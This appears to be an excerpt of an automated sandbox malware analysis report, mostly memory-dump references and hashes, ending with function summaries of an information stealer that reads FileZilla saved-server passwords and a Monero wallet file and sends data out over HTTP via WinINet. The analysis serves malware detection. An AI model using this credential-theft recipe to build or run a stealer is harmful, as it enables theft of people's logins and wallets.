                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f2812867bb457751227ef0114f796f1ff1fb1f35c093401ff1a0b9e042c8fc61
                          • Instruction ID: 7b8b2d771581c47cdd222d391f47543857f3a2fbb11dce2607ed5188f0bdcee8
                          • Opcode Fuzzy Hash: f2812867bb457751227ef0114f796f1ff1fb1f35c093401ff1a0b9e042c8fc61
                          • Instruction Fuzzy Hash: B8614BF3D082109FE3046A2DDC4576ABBD9EFA4320F1A463DEAD8D3784E9395C1586D2
                          Function 00358BBD Relevance: .2, Instructions: 187COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 86ac20e7a8eeb2ed65c857d8eb3220bf7392920dee59ceeb5589ebf081e9ca61
                          • Instruction ID: 4c34edb7a9ac9a4da01ec95acaec8a3f699d472973068e9e7e6ea02313396704
                          • Opcode Fuzzy Hash: 86ac20e7a8eeb2ed65c857d8eb3220bf7392920dee59ceeb5589ebf081e9ca61
                          • Instruction Fuzzy Hash: 4B512EF3A0D2005FE7089E2DDC9177AB7D5EF94720F1A493DEAC5C3380E53958058696
                          Function 0040317A Relevance: .2, Instructions: 158COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e5dad469fd3f2883f41415a9c412404a8dc94390dbd34234e1cf2a2335c50ef4
                          • Instruction ID: b0c34bf04133cb380fcb75cdd4a1d7ea874574763cb76d1cb2ba04529be03c0c
                          • Opcode Fuzzy Hash: e5dad469fd3f2883f41415a9c412404a8dc94390dbd34234e1cf2a2335c50ef4
                          • Instruction Fuzzy Hash: 704179F39086349FE3156928DC857BAB7D4EB54361F0B463DEFC593B84E839180582D6
                          Function 00096799 Relevance: .1, Instructions: 131COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                          • Instruction ID: eee516e986790157c2010e9f8dcf2a762141cd74d176335cf7bc9b07d0d6be57
                          • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                          • Instruction Fuzzy Hash: 2C513B62E09BD589CB058B7944502EEBFB21FE6210F1E839EC4981F383C3759689D3E5
                          Function 003724CD Relevance: .1, Instructions: 107COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7fafe65eebbe0cb669ff1efd4d9d8410eeca12be133b00af863b04a521c9b013
                          • Instruction ID: f217e58950ce1d377169938b9b6526b45b12495ab066869b64668252da3a809a
                          • Opcode Fuzzy Hash: 7fafe65eebbe0cb669ff1efd4d9d8410eeca12be133b00af863b04a521c9b013
                          • Instruction Fuzzy Hash: EA31D1F3A182009BE304BD7DED8536AB7D6EBD4320F2A863CDAD5C7780E97C94058652
                          Function 004658FB Relevance: .1, Instructions: 64COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a1714a75b3a0fd3f42eb43bbd75224800f47e1dfd6c06878719c02c43e555074
                          • Instruction ID: 187d93af1d521edb9ad6eb443697805b1dff4eff6c9bb57025b7d4c8df263f98
                          • Opcode Fuzzy Hash: a1714a75b3a0fd3f42eb43bbd75224800f47e1dfd6c06878719c02c43e555074
                          • Instruction Fuzzy Hash: D41126B7A592280BF354987ADC557A3768AD780360F3BC93E9E14D7A89DC7E5C0202C4
                          Function 00067588 Relevance: .0, Instructions: 15COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                          • Instruction ID: 4d4380f719737e920eca18c290049424b63e8615d1407fedd07d3ef3da97591e
                          • Opcode Fuzzy Hash: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                          • Instruction Fuzzy Hash: E5D0C9716097114FC3688F1EB440946FAE8DBD8320715C53FA09AC3750C6B094418B54
                          Function 00039AA0 Relevance: .0, Instructions: 15COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                          • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                          Function 000303B0 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 00038F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00038F9B
                            • Part of subcall function 0003AC30: lstrcpy.KERNEL32(00000000,?), ref: 0003AC82
                            • Part of subcall function 0003AC30: lstrcat.KERNEL32(00000000), ref: 0003AC92
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0003AAF6
                            • Part of subcall function 0002A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0002A13C
                            • Part of subcall function 0002A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0002A161
                            • Part of subcall function 0002A110: LocalAlloc.KERNEL32(00000040,?), ref: 0002A181
                            • Part of subcall function 0002A110: ReadFile.KERNEL32(000000FF,?,00000000,0002148F,00000000), ref: 0002A1AA
                            • Part of subcall function 0002A110: LocalFree.KERNEL32(0002148F), ref: 0002A1E0
                            • Part of subcall function 0002A110: CloseHandle.KERNEL32(000000FF), ref: 0002A1EA
                            • Part of subcall function 00038FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00038FE2
                          • GetProcessHeap.KERNEL32(00000000,000F423F,00040DBF,00040DBE,00040DBB,00040DBA), ref: 000304C2
                          • RtlAllocateHeap.NTDLL(00000000), ref: 000304C9
                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 000304E5
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00040DB7), ref: 000304F3
                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 0003052F
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00040DB7), ref: 0003053D
                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00030579
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00040DB7), ref: 00030587
                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 000305C3
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00040DB7), ref: 000305D5
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00040DB7), ref: 00030662
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00040DB7), ref: 0003067A
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00040DB7), ref: 00030692
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00040DB7), ref: 000306AA
                          • lstrcat.KERNEL32(?,browser: FileZilla), ref: 000306C2
                          • lstrcat.KERNEL32(?,profile: null), ref: 000306D1
                          • lstrcat.KERNEL32(?,url: ), ref: 000306E0
                          • lstrcat.KERNEL32(?,00000000), ref: 000306F3
                          • lstrcat.KERNEL32(?,00041770), ref: 00030702
                          • lstrcat.KERNEL32(?,00000000), ref: 00030715
                          • lstrcat.KERNEL32(?,00041774), ref: 00030724
                          • lstrcat.KERNEL32(?,login: ), ref: 00030733
                          • lstrcat.KERNEL32(?,00000000), ref: 00030746
                          • lstrcat.KERNEL32(?,00041780), ref: 00030755
                          • lstrcat.KERNEL32(?,password: ), ref: 00030764
                          • lstrcat.KERNEL32(?,00000000), ref: 00030777
                          • lstrcat.KERNEL32(?,00041790), ref: 00030786
                          • lstrcat.KERNEL32(?,00041794), ref: 00030795
                          • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00040DB7), ref: 000307EE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 1942843190-555421843
                          • Opcode ID: 4189ee9c0b9cc1faa45b9c8921d44550107a71fc00b808891047885db88817a5
                          • Instruction ID: 09ff1fcc8d2297ce5744f59c841a46b1cf877e97d47969786eb623f6cb9fbba9
                          • Opcode Fuzzy Hash: 4189ee9c0b9cc1faa45b9c8921d44550107a71fc00b808891047885db88817a5
                          • Instruction Fuzzy Hash: 2ED14171E14208ABDB05EBE0DD6AEFEB73DAF15340F008564F24676092DF34AA49CB65
                          Function 000259B0 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0003AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0003AAF6
                            • Part of subcall function 00024800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00024889
                            • Part of subcall function 00024800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00024899
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00025A48
                          • StrCmpCA.SHLWAPI(?,00FDEA68), ref: 00025A63
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00025BE3
                          • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00FDEA88,00000000,?,00FDA420,00000000,?,00041B4C), ref: 00025EC1
                          • lstrlen.KERNEL32(00000000), ref: 00025ED2
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00025EE3
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00025EEA
                          • lstrlen.KERNEL32(00000000), ref: 00025EFF
                          • lstrlen.KERNEL32(00000000), ref: 00025F28
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00025F41
                          • lstrlen.KERNEL32(00000000,?,?), ref: 00025F6B
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00025F7F
                          • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00025F9C
                          • InternetCloseHandle.WININET(00000000), ref: 00026000
                          • InternetCloseHandle.WININET(00000000), ref: 0002600D
                          • HttpOpenRequestA.WININET(00000000,00FDEA48,?,00FDE068,00000000,00000000,00400100,00000000), ref: 00025C48
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                            • Part of subcall function 0003AC30: lstrcpy.KERNEL32(00000000,?), ref: 0003AC82
                            • Part of subcall function 0003AC30: lstrcat.KERNEL32(00000000), ref: 0003AC92
                          • InternetCloseHandle.WININET(00000000), ref: 00026017
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
